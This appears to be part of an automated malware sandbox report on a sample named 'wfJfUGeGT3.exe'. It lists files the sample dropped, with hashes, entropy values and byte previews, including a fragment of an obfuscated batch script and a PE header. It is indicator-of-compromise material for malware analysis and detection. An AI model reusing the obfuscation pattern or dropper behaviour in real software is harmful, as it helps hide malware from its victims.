                                                        SHA-256:609B33673BA3698DE21D56BCE0A871D9D96269C7D86BC087419610452675A90E
                                                        SHA-512:4F977BA99B3F88D60380F81EFC0B74BBE4AE29573E0E8CAF0F5899E83F29BE895391FF374A0E557B5BE4EECD241829A442C92FA72F5DDDCB440A45CC4356A157
                                                        Malicious:true
                                                        Preview:K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'|.....$..*.!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.K*qBG0..?.....?&9;...%..o.x..*.v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..|.'..Y.J...k..B.zW..no..Rk."....|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l.*_oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66560
                                                        Entropy (8bit):7.997049155940351
                                                        Encrypted:true
                                                        SSDEEP:768:EFzQqu3JDyFgqUKY0iJ+m7L/Z+67tnwlmxbJYMzwExLG//rxJrjRmq2Q04SMtO9O:JegqUKYyiL/Z+6ZwQz38ExUVJ8ZpLw
                                                        MD5:57B8AB1323416077ED8BB346DD2DAA09
                                                        SHA1:43116DAE9716CAF4E7F43943A89E357204C842F8
                                                        SHA-256:1A8D43ECF42D62C9F4DFDAD24C25136A028760A19CF4FD27336BFBB0962426B9
                                                        SHA-512:1899D8CE43C0E18FF3D7EA833680921A717D098FD2C4F8F5DED7007AA31F9946D6895F65364B17BA7DA2F77AFA5EF3782EEFCE562314776BC7FC8B5CB45B1F37
                                                        Malicious:true
                                                        Preview:.,..I<.......b.F.xt*......f...jS9..S.e!H...*h.:..H.h.......e..h..q*....+k....n.?..(..G........e...6..uH|.d.[.}....B=...y.b.e..o.~e.B.z..............D.a..k...'..:y...^...2.C..6#..Q......U..p..C!.:O..f.V.pG.X /...%"..$...B?.wx.]..8.c...4.|.BC\`..;.'.iH...P....@.n'....(..w.d.....;..VV..5X...NV..z..'...X...D`.....L..K.{T..~.."..~'.......G/.+...9.BNT.\S..k...%98r....2.@`a....T..1.#f..SY.......;.tL..$pL...D.C..E.....]..s#G(.".'..5...$.|..px...m4..ij...8xy..&.2...[HS...@.?p6...%:.4#...[.....#%..q..Z$.... om..#.6..=..z4...~;f*........(me..y.K.9SF%..n.Ug.......)!jA7.H..8.z..*..].j.."9...d........s..Sr..."..?.|QB....F....f.F.d:......$..(.....S.>.C;......Q^iOj.5..}.......Q.i.:RB..8O.H.w..[..!w...}...j...a6.q..+%h[n..mY..5...m~....6..,Q.[.5h.T..K..7LX.a....P...3..a.?.Hq..?....A~4I.|.,...../...c....+......>M.C..m.|.$..|..T.h.s`cc..pi..;.....\.E..".U. .B.\1....ir.N.}...Ob'....f..P..'....X.,.U-...G.60K.....p&F...h7/.H........SQ9.W8......f.@..,.`....P3.*.
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):94208
                                                        Entropy (8bit):7.997973981352657
                                                        Encrypted:true
                                                        SSDEEP:1536:rIMLTZUD1zCXWdOfnDci2EvLSaB6SPY4DvNn9pEbRJu/dIKRFA6:rI89URzCGqnDrxv23+XD1E9s3Re6
                                                        MD5:1C78EAD3742C95A2C4DF31C8D71E0F1B
                                                        SHA1:A075CCA4D9D8FA5FE3DDBF1F2D6E120208CB5B17
                                                        SHA-256:B25E0F67C38257DBC0AB9A7D6AF8870C878211ABD4E51B8DB52D9C3E2272652D
                                                        SHA-512:09A234D52B31B38A4071078ABDC9A976AA58716A7BA9F1832B84966F039B621044EAAA641FDB2C919FE5334902E4DBAA8E3FD19A638583120F881CDE218B9112
                                                        Malicious:true
                                                        Preview:.._M.......ii.W.X..."2.~#?........-=..l^./....k..%....y.....5k.m.T.n!.....\.[...z...%s7..c.....t....}.UF.x.yHp/s....P8.~...*k.%Z*pX/o$~e.....=..c..&...f...m....Z...^.....5.}&...v..$./S.y|.....J.$uJ..<!x..9HW..iS..~...CL!+..F4..G|r..>f........n.._GZ.^...w..I..y..v.....@.;.c.-3...J;..u..w....|...2[.C.&'@5>.].)-..D.....]..zT.&.X.....L......?<..D.4...n.V..>.a.$..... .}....SU......_r.'.Y.4y..b.n.8......H..d.n.)....F..p'..W.u&..|.{E.^_......w]m...yi.|..R..tS....S......ZR:.v.5...1.....zp.....,..S.OT'A.e.v..."...)"^.g..TK.#t...V...S....Q...3.z.....Yb%r..\]..4..{QhN..?g.2..e...n...T)&..o......qs....[.;U}]..GU......y}..kn..e...SE.ker..8....]......k.\.Eqxu.....J.k...v.7.......].t...a/....l5.N_.m.&..l...HB.Iz,.m..j=.,.#....}..TO.3;...d..Mg...6.O..g.q..w=.z.q<...._*Ebk.F..*.0......s.D.....c.?.Z.... ..*$w*..)....&..u[w.=......}j?!a.....[..q.*Gh..8...V....~.....P.......dS.P.......nwM,|.7Q..q.X...E..nE.p(.b.[I...L..Q.>b.."...8Qx/....1...$.cR........v..."p
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):100352
                                                        Entropy (8bit):7.997940176517337
                                                        Encrypted:true
                                                        SSDEEP:1536:rh9fG5c8ghh85Az6ZgnXdrZ4QD9hZtBCyV8qmRfQQ1BXclmgWnS3lpvaww210:bZh85ynXdrPJhQj5X1BIB2SVpvawT6
                                                        MD5:043E35E2330184D548101DFDB638BE96
                                                        SHA1:F73E6F2AF1052B4810820C68F9693E90F6A07D6D
                                                        SHA-256:2D081C4A75403C808336CD690598E765D1277CEA32E3CEA2CB7BC0E62AD35C77
                                                        SHA-512:D764704F01B91644DF122C4EFF4DBA404A46BC436C45F5406509E509213306A0CDED57CBBECA20A6B474C656C294A91E2EA16025B267AF34F4760FC02A8D69C5
                                                        Malicious:true
                                                        Preview:.9".ax^]......`.?...W.........9....o...}>....p.n.*=..ge..6..VF.p.P=..?l...j.....M..F../........z.*.T<.TmWup..A0Yd...W..O.8...D%.S.'\j..(.-...2wpw$.K...d~.0........c~.(.@.......P...]..T.WK*f-.8a....%.r+.y...U0.FP@.k............r?......04Y.{8.yG.H.Vi.d%..=a....aM..j..ZH.3.. ..%..k%.....69......O.._.8.)z....Z....b0&..E2....\Z..G.m.....n.NB..Q.H.Th.....e...{...)...H.b.<{|.o.....A(...../.m;..t.j...<L(.XL...m.. ...R.VA'../?....HF.g...Z.|...]...D1...8t.W..T........i..}.z...h$.XF~8n+..6....N......T.X./...l#...z.N...q..8.A...!...&>.Ur..{.*......k....K...........c_.&.C.(f-.|F2..ap...~.O.........b...BJ6...9,.9W...}...8...]..U..$.9.....@...@NV..>.[p;T..$.l`_a*..k....e..?z...Z./../.g..B./..H..z...(......F.G....n...k L"b#W...!.I..;.F.B.r..1.qY2..c.e......P...W,....&.T.xj..0k.W*...4....v...G.".N:....2t.R'[...Y.n!.m[_..A%...-...tV..5...K.K ..Xb......D|.1.E....5.G...b......Z...e.......<{.......55....j...Ga,.g..)...........Z.HD%v......=..A.ys..
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:ASCII text, with very long lines (574), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):12305
                                                        Entropy (8bit):5.0949681487880785
                                                        Encrypted:false
                                                        SSDEEP:384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
                                                        MD5:CEF464062B7E5B404539D0C443917907
                                                        SHA1:01802C968D8917FAB13D71BFE4ED62E36E965745
                                                        SHA-256:5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
                                                        SHA-512:A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
                                                        Malicious:false
                                                        Preview:Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with very long lines (574), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):12305
                                                        Entropy (8bit):5.0949681487880785
                                                        Encrypted:false
                                                        SSDEEP:384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
                                                        MD5:CEF464062B7E5B404539D0C443917907
                                                        SHA1:01802C968D8917FAB13D71BFE4ED62E36E965745
                                                        SHA-256:5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
                                                        SHA-512:A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
                                                        Malicious:false
                                                        Preview:Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):868
                                                        Entropy (8bit):3.5548026049869303
                                                        Encrypted:false
                                                        SSDEEP:12:OyGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9dte4:OyGSnPQxqtPMLqCj8WCBl9dte4
                                                        MD5:20CA365E882B4C4A95B110E62F8A4C08
                                                        SHA1:662E9B589D89DE106713F361D8B2536740554785
                                                        SHA-256:2739A9B72A38C08A6385701C6BAFEB7FDD7FAE8B33ACE80732EC934EC8518C6C
                                                        SHA-512:9682A8935932673B2C1C5FDA831C5B1E53219DBD74DBF96E483CDEC68DB6B31A69D714F6257C62A708BF0B6A2773F5F01EFC86CB54FCC084341A862ED6E4D6FB
                                                        Malicious:false
                                                        Preview:BachelorRayPotentialBeats..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):81920
                                                        Entropy (8bit):7.997608168843038
                                                        Encrypted:true
                                                        SSDEEP:1536:YTpO3XWfDyw7a9utGvuEpqKw7NmLFd6oQbQbsbLvisrIl/xbH48kVGboiW:YPfOwOutGGEpqd7Gd6/bQbILv5rC/xL6
                                                        MD5:72DCAD57E5699DC20CB41F6AE4ACD115
                                                        SHA1:CB7E6842F24319262605EA2C1BF3A7EAE60358AF
                                                        SHA-256:945D570376B997851FD74131BCF117AAD625341FCB7B756409E7CB711632CB0C
                                                        SHA-512:5F251F25514D5D138D20B308C2C162DAF9520DDE28F25379D09ACAF1F2FC67BCF9A3BFA62A42D83C19FEBFD28809E82561AA2B19614735037930964D1AA18AFD
                                                        Malicious:true
                                                        Preview:/..a..."x.9*....7M..-.Pf.GS.nR. ...]?.qI...!...(..i}.......-....$c^.{........d...yZw=:...^D....SA..s.o...y.A...G...].k.#..p......5]......,Q..w....n{.7...T...).,1.O_`...[...R^ W..3...+.....U.f$...2g............Z<...jD.J..d.C*..<..t#8.Go....$...{.I .f\.........P[.0..ad.}... P......!do.y..M.[].Z`~....{&...&...}.f..Y........+9!.".^GE4"BH...=.O...~k...s}|.A.'0.>.....c=.p.X..8...;0....q.WQ..^y.A.....F8.`^Y...Z.....2.x.p.8e..UD...b...<..V..;"............_..S.hP4....v.<L.Z....mi7.. ..o..".|. ....*{1H.+S.....F.r..I...#..L..>_..M..@..H`...@.N#..z..Z.....J......H.2f...%._Smv.p.......,-.ef8......=...+./~.|......).....=..M"..*.._>.Z.......y.l.h...6..#.'.N9.-...B..OG.<..:k..*..'.#Q....mV].Rf."9".._jm.....?.cX.........E}......g.n..*...e..(...UU..8@),...n.bj, .u......ew|.;/..R.l..u;......|.U'\....=.o.p_..$..b..=.../a.Uv7M...p..~`.X...C.G....Ljs.s.;...y..M.:..lUi.d..,.Kk.(..Cq.V......."Q.^.W..V...v.*;._Sg\Y:..........)Y.Z..*cC-.......~.....o...3.>E7..D.@2.&JV.
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):75776
                                                        Entropy (8bit):7.997896408510753
                                                        Encrypted:true
                                                        SSDEEP:1536:L1lLilX3YfWBMdU67iXs7D2VtQZzraEA4cA19fx0+bnGiI6CJBKA/7J/fR3Wg:LXuVYwMdU6Vu8zLbcAjffzvITBfR
                                                        MD5:D6A091E43DB1334C92A9163FB999AA13
                                                        SHA1:380674ED8D23C1EC2F9A5F5B0167970B296772A7
                                                        SHA-256:2299A0DF735B5C6A171DDD6A1B009756C19EC3BB1383BEF34BCA8FA7F4A6CF09
                                                        SHA-512:4142FC9995B083BC2D3D9B5C2789EA564117ED0EDE14A1AA510E9B32B8FDCD149350CE8069EC168141E720D4FFAA246BC7A4585FDFF4466343CA3F4D206719F8
                                                        Malicious:true
                                                        Preview:..t.^.% ...s...6..^.WIB.d.."..q.....;;N....tS....U..4.rI..L....V....%#{.?....'.....e...5.....Z../...d!U..q.H.3R.].lJr......I.q...j..(a..H.T].k.....Bc...+.*..@A>..../@..@2..,D.......a......]IG,.S......S.|-$.\..0[.'.'...p'....y..ZhD.......X....'....e..8........'..1e.1.h...3!..@?.P.Lz.t.(..I..........N.....Q%..........l.............^B.~5)u.Z.A.=zO....8.M...s..5....~z.z..[..f.......R...+}.?.p...K.S.Y.%...E^+`..e.U..9.(.....c4Y.+.....?...=.W.....]m..O.R.....Vx.k...<.N,[...i:]...c.....bA7.....N..."....;.h.om?...>..]..G>./$..>....1?.M_4D..Z.@ykX!.A.`7..rxs$..Vr..T..4-....F.H...6@\.k...^;Ie..........R..|...Z...>.0.k6gDD..%...............u......H..m.`......c.6....;<z..N.m..#..;5..5m>..:.)...m.E........J.FyK{@`.}^o.O..^....g.j./.w..>.~..1.=^.lQ5.LR.l.U.[+.|2E.Fc.njaVW.3..-?.JW.......t>Z.X3.K.a...@.....X..59..v.^....L..J5$.,.e.LA9.`.=.{V..X. .....$.....(...C...c.djF....'.....TNp...5]$'..?H.(j68.c;T....Ro..$>..E..w.D..-.@...}..%.6w.
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):892767
                                                        Entropy (8bit):6.621907056901829
                                                        Encrypted:false
                                                        SSDEEP:12288:vpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:vTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:EA1CFAD1B98DA498ADDAD255609D0E5F
                                                        SHA1:14FA7E96806624330A8899B215550122AEB94C91
                                                        SHA-256:DA224EA0C81FD05189621037F4F0B856F47DD1FB0841D4142395F638DA7EB802
                                                        SHA-512:EDE7FA0FC6922366DD7319BDC0A00AF36B39D506EE246A18D66641374A04727318ABDC8832944995C4374487515B38017A081FFBFA17F566B1C83FAC59E39442
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F|U............[...U......Ky......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W......
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):7.997177526469974
                                                        Encrypted:true
                                                        SSDEEP:1536:YyWwUSme91qs+wl3fncHWq54NBb1ImVq80aoQXsmoRwmYEa+xRHoBgW:nPdxqsH302q547xImVq80jRnyWugW
                                                        MD5:5FC7641883018EDBF0EAD49AF5EC3CBC
                                                        SHA1:B021E03764AA36D5B5176AB9DBD825001D9797C8
                                                        SHA-256:419E973C6E735BBA8B60704A962E0B79D285E7A09CB317AEFAB1ED001A1BF344
                                                        SHA-512:698C1EE8137077116160E8958DAABED29DA1BFC2C9CE9795A5242FBD8A61FD2D425AA5722542D60F8DF15C2AF19A3ECB4A7D3628C9FDBF40F46A37769647EADE
                                                        Malicious:true
                                                        Preview:...A.x.1..y.d.RBw?...\.t.4.t4.M..0..#.}._.!LF.W..".0v>..g._w=;.W+.y.,_]..=....w.W...b...Q.C...........&.Gl..`L...@'...u...6......XM.T8w@.1....wd.=...o..7..gz.Hr....y.._.4o.I.j..uzi..8y1)..-....iR..'tX...B...rx...>.q..K...1......CP.....:...#.Z..<.}. )..%..!......r..>.4S%o..a....O.i....>W.;.r7.+........>.......R.........K(LA/./../P+..GF0..lJ...R.81...#e..V......>.H....P.....V...;0...\...GQ..D.h.d.}.:..r.h-1..@..R.....U|.W....MjK....ah.u..E.sm.........m....j....4.t....8........Cm,o..~.f..i.E.1...SNNL.:]..B.....>......O......P.5...S).cz.+....!.1.+.Q....8.)..6...VH..E&...1ro..-T._e.k{.z6Tc...DQ..};.e....^..F.8...a.nd.,u...$*...M.r...." .+..[..x....o.7.-+.#O&v~0..V~.....\....w,.).......Vd.T...d....[A.tV!../..|...5...L...-+.9X....).;.>.w3.JMI?........f.MDA.#..P.E9..wU..6.k..9.............W...Zr.Jvc..D..,.iX....;h?:%.O67.4E~.i:]2....y..H...Y.....q..x....T.5...T....h.l{.;......Rk..A......5.r.+.%9.}.[B?...a..P[.4..F%....[a...Y2T.r......%w..N...
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):83968
                                                        Entropy (8bit):7.997706963404338
                                                        Encrypted:true
                                                        SSDEEP:1536:KlyC1ycjURzts3v4p/Kqm36vqVBvybzERtSb+ERRG7XZhY+RCtw6nSWbj:ayCcts3dN6yVZybAL+3RM7XExteWbj
                                                        MD5:5737221E4786A16DB1D00B526A889913
                                                        SHA1:B44EF92D0F12E91E236F96359FA3667C773703AB
                                                        SHA-256:743304691772B7F4B1254B7EC4DEFE408ABD5380C260906FF5D51018CC51C7F4
                                                        SHA-512:0B3219FF89BD5F80AA83682C6193C8F540058262231F343AB11EBCCB7849CF45B1B2850494150522479735304CD255E4BC25C1BD76A42F7482E43A3F60D000EF
                                                        Malicious:true
                                                        Preview:......9.....x.]Ky.D~.7.K.....A._v.7..QG.x.O..{S.........A......%.-L.....1..dQl..Z9.ed.7X?.52<...R.F......&...j>.-........d.m..K3W.@....8.....*...[.w>9L.&1H.qn....\.m.Xr..Z...g'`}.6........7^..Vl).........Af3V..9...0./..+..3.xM....C.......}/5..>......5'...5...@kR?.............p..%.m.%....W...~.......O..k....'.w.4.t....N...%.!9s.P..&.....n.../f...".....A.......:..B..O.\f.i.}.q...H.V.`...c...r/<7-J.X/........._.f............=.......r...R.^>.b.._'.i.phl..V.cR$d.[....E..60iZqx8f.....O....d.0......W..W.&..;...|....d..$..j?.Rz..\.....h.V.....eO..#Wc...1m...X.].f..R$..L=!.3..I.J+.b{.k .YKLN....#.:v....\.q.2..:..z.].|o..Ug..c.....#>..^......?BA?."!.}.........z...^..5.h..a..0._.R..K>......:..S".1...T.H7Nduu....yA.8.&@J.Y.>..B3.?.....&..F....5.P.D..&......K...\.<#.p..=.Q.B..]*....7...K.T..~A.......H)`.WU...Cc_......3I.0...u.>y...]rK+.u...{.....N..I%.....?....!..Q...3. B.CaO.Xw#".s.~.,.g...c8..Y......e}q?....UO=.........i.|...p.._.U.d..T..]..mk}.4.xV`..
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2662
                                                        Entropy (8bit):7.8230547059446645
                                                        Encrypted:false
                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                        Malicious:false
                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2662
                                                        Entropy (8bit):7.8230547059446645
                                                        Encrypted:false
                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                        Malicious:false
                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):67584
                                                        Entropy (8bit):7.997347802965752
                                                        Encrypted:true
                                                        SSDEEP:1536:AZcxT5PMfnoT5IAyrEBysFZAken7iV0myzZMJMqNW:AGXkoTCAxBysFDen7I0mKZMXc
                                                        MD5:CF18A7ED11645523ADDBD2FBB31B014D
                                                        SHA1:09CAF4ED6B6822E838D3512CE5A75E4125192C5F
                                                        SHA-256:27DBF0E6F006AE0F7FA94CD33287E7F3AB85E1FA637636EFF8E94EB649E45990
                                                        SHA-512:F1CFC3FBACCFCD199B99AC647A2A0F76A05A7DB1B655FA2E9DE44DEF1630BEBBFDBBD814225664F2D7D7015FF73B87C02242BEC5105460459694F03E836F0D56
                                                        Malicious:true
                                                        Preview:U.v.)....F.VF..r...lgr.#.L...!...~.....K@.Bu..v..........u.m[g5.t......'...0f..8B....,..q.1-..n......x.zN..........U.....J..<.LHb.j.. ..<.>ha..v~}..m.+s.......7.....C ........}...../........8.i..d....#.Q^K./-DQ^.:...S.E.Wu...1.,WY.R8+.,...<\8.=.....'.;.9.U?.8.hZ.'.........L..C.x.v3.8.....w4ub?X...t.r.`|.[../.....n.%.{W.y......,..1g....+.@J..y.AZXR.....]\'._jS...0.g......>R..CL..m..".......*rO.b.f.f_.-.......x.x..+.t./.....d5..4..z....W. j.>...2x'.i.){.Qy..B.(.>....a-.h.....G........u..r.......1. ..{.X...`.A..@....u..o....4......H.+?.t....r.....].. .1...VD..c...OB...R.E.....g...g.%I....y.r..1...OL6.Z...E..+5.....3.C&.....0M.t%*.qT..v.g.>X..f"W..n.]l.......2........y.-.k..3#..sCGE.P..W..7....X..{.f^.7....W..t......||WF.$.,B`O....'.b..tpKu]...C.@.C.........z..s.....>y[.:^....Dn..Y..).2y.....t8....7.E17MW."G..df.V.Plr8...5..........#.......;!,..g...u9P...f.}..{...h'.....^....p-/...i....a...r\..b......n.5...Fo.ZU..%../>8.<c....
                                                        Process:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65112
                                                        Entropy (8bit):7.996543686201188
                                                        Encrypted:true
                                                        SSDEEP:1536:BPYs0v/j8Hkrp5mua/2KosFnVD6i5nckhaGx54u/zb:CsO8Hipna/l6Av
                                                        MD5:DF9A85AF5771EA736A104B6E3EB86F0B
